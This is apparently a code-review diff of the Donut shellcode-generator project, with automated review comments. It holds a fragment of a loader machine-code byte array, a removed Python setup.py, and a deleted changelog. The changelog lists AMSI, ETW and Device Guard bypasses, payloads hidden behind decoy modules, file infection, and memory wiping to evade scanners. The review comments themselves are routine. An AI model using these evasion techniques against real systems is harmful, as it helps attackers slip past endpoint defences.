@ -808,12 +815,12 @@ unsigned char LOADER_EXE_X86[] = {
0x24, 0x8b, 0xf0, 0x83, 0xc4, 0x10, 0x85, 0xf6, 0x0f, 0x84, 0x75, 0xff,
0xff, 0xff, 0x85, 0xed, 0x74, 0x33, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74,
0x10, 0xff, 0xd6, 0x8b, 0x54, 0x24, 0x14, 0x8b, 0xf0, 0x85, 0xf6, 0x0f,
0x84, 0x5a, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8, 0x9a, 0xea, 0xff,
0x84, 0x5a, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8, 0x46, 0xea, 0xff,
0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x44,
0xff, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x20, 0xeb, 0x34, 0x83, 0x7c, 0x24,
0x10, 0x00, 0x74, 0x10, 0xff, 0xd6, 0x8b, 0x54, 0x24, 0x14, 0x8b, 0xf0,
0x85, 0xf6, 0x0f, 0x84, 0x27, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8,
0x67, 0xea, 0xff, 0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0,
0x13, 0xea, 0xff, 0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0,
0x0f, 0x84, 0x11, 0xff, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x40,
0x04, 0x8b, 0x54, 0x24, 0x14, 0x89, 0x06, 0xe9, 0xff, 0xfe, 0xff, 0xff,
0x8b, 0x3f, 0x8d, 0x83, 0x70, 0x03, 0x00, 0x00, 0x83, 0x7f, 0x18, 0x00,
@ -860,14 +867,14 @@ unsigned char LOADER_EXE_X86[] = {
0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41, 0x80, 0x39, 0x00, 0x75, 0xef,
0x8d, 0x44, 0x24, 0x60, 0xc6, 0x44, 0x14, 0x60, 0x00, 0x50, 0x8d, 0x44,
0x24, 0x24, 0x50, 0x57, 0xff, 0xb4, 0x24, 0xb0, 0x00, 0x00, 0x00, 0xe8,
0xd4, 0xe2, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x8b, 0xf0, 0x8b, 0xc6, 0xeb,
0x80, 0xe2, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x8b, 0xf0, 0x8b, 0xc6, 0xeb,
0x16, 0x8b, 0x84, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x2b, 0x43, 0x10, 0x8b,
0x34, 0x82, 0x03, 0xf7, 0xe9, 0x6e, 0xff, 0xff, 0xff, 0x33, 0xc0, 0x5f,
0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x90, 0x00, 0x00, 0x00, 0xc3, 0x55, 0x8b,
0xec, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40,
0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c, 0xeb, 0x20, 0x85, 0xc9, 0x75,
0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14, 0xff, 0x75, 0x10, 0xff, 0x75,
0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0xd5, 0xe0, 0xff, 0xff, 0x8b, 0x36,
0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x81, 0xe0, 0xff, 0xff, 0x8b, 0x36,
0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46, 0x18, 0x85, 0xc0, 0x75, 0xd9,
0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24,
0x24, 0x33, 0xc0, 0x55, 0x56, 0x33, 0xed, 0x89, 0x44, 0x24, 0x0c, 0x57,
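Review bot: the only differences in this hunk (`0xd4, 0xe2` to `0x80, 0xe2` and `0xd5, 0xe0` to `0x81, 0xe0`) are the 32-bit displacements that follow an `0xe8` call opcode, each reduced by 0x54; that is exactly the 84 bytes inserted by the earlier `-359,48 +359,55` hunk, so these, like the single-line changes in the `-351`, `-442`, `-468`, `-630`, `-743` and `-808` hunks, are relink artifacts of the regenerated LOADER_EXE_X86 array, not logic changes. Because a regenerated byte array cannot be reviewed by eye, the commit should name the toolchain and build command that produced it so a reviewer can rebuild the loader and compare the bytes.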


@ -1,59 +0,0 @@
from setuptools import Extension, setup
import sys
with open("README.md", "r") as fh:
long_description = fh.read()
static_libraries = ['aplib64']
static_lib_dir = 'lib'
libraries = []
library_dirs = ['lib']
extra_compile_args = []
extra_link_args = []
extra_objects = []
include_dirs = ['include']
sources = ['donut.c',
'hash.c',
'encrypt.c',
'format.c',
'loader/clib.c',
'donutmodule.c']
if sys.platform == 'win32':
libraries.extend(static_libraries)
library_dirs.append(static_lib_dir)
extra_objects = []
elif sys.platform == 'win64':
libraries.extend(static_libraries)
library_dirs.append(static_lib_dir)
extra_objects = []
else: # POSIX
extra_objects = ['{}/{}.a'.format(static_lib_dir, l) for l in static_libraries]
module = Extension(
"donut",
include_dirs = include_dirs,
sources = sources,
libraries = libraries,
library_dirs = library_dirs,
extra_compile_args = extra_compile_args,
extra_link_args = extra_link_args,
extra_objects = extra_objects,
)
setup(
name='donut-shellcode',
version='1.0.2',
description='Donut shellcode Python C extension',
long_description=long_description,
long_description_content_type="text/markdown",
license="BSD-3",
author_email="therealwover@protonmail.com",
url='https://github.com/TheWover/donut',
author='TheWover, Odzhan, byt3bl33d3r',
include_package_data=True,
zip_safe=True,
ext_modules=[module],
python_requires='>=3.0',
)
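Review bot: this hunk removes setup.py entirely (`-1,59 +0,0`), so the `donut` C extension built from donut.c, hash.c, encrypt.c, format.c, loader/clib.c and donutmodule.c (linked against the static aplib64 library) no longer has a pip build, and no replacement packaging appears anywhere else in the diff. If the Python module is meant to survive, this deletion should be reverted; if it is being dropped on purpose, that should be stated in the commit. A side note on the removed code: the `elif sys.platform == 'win64'` branch was dead code, since CPython reports `win32` on 64-bit Windows as well, so the remaining `win32` branch already covered both.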


@ -1,36 +0,0 @@
* v0.9.1:
* Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
* Automatic detection of the CLR version required for .NET Assembly payloads.
* AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
* Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
* Bypass for Device Guard policy preventing execution of dynamically generated .NET code
* Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
* v1.0:
* Added module overloading for native PE payloads. Hides them in MEM_IMAGE memory backed by a decoy file on disk
* Added an option to block indefinitely after running the payload
* Added Dockerfile to create a docker image for generating donut shellcode
* Added support for binaries without relocation information or with certain edge cases for relocation information
* Added custom GetProcAddress and LoadLibrary replacement functions that will only call those Win32 API calls as fallbacks
* Better documentation for debugging, designing with, and integrating Donut.
* Added moduler bypass system for ETW
* Change the -y parameter to be an offset, relative to the base address of the host process's executable. This supports using donut for file infection (like BackdoorFactory).
* Added option for preserving or overwriting PE headers of native payloads
* When Module Overloading and PE header overwritten are enabled, the payload's headers will be overwritten by those of the decoy module
* Added support for HTTP Basic Authentication with remote modules
* Native PE Section permissions are more accurate
* Fixed some issues with the MingW makefile (#96)
* Fixed and improved all makefiles
* Added an X86 MSVC makefile (Makefile_x86.msvc) for ease of use
* Fixed the Python module
* Added an inject_local.exe that runs shellcode in the current process for testing purposes
* C# output generator
* Python output generator
* UUID string output generator
* NTHeaders->OptionalHeader->ImageBase is now updated correctly
* Sections' PhysicalAddress is now updated correctly
* Much more detailed debugging output
* Better wiping of data in memory to evade scanners
* Improved error handling
* Default AppDomain is now used when entropy is disabled
* Updated reference to go-donut
* Stack pointer is now correctly aligned (Kyle Willmon)
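Review bot: this hunk deletes the whole 36-line version history (`-1,36 +0,0`), including the v0.9.1 notes and v1.0 entries such as the `-y` parameter becoming an offset relative to the host executable's base and the HTTP Basic Authentication support, and nothing in the diff moves that history elsewhere. The change log should be kept, or its replacement committed in the same change, so users can still find these behaviour changes; whichever copy survives should also correct the typos `choide` (choice) and `moduler` (modular).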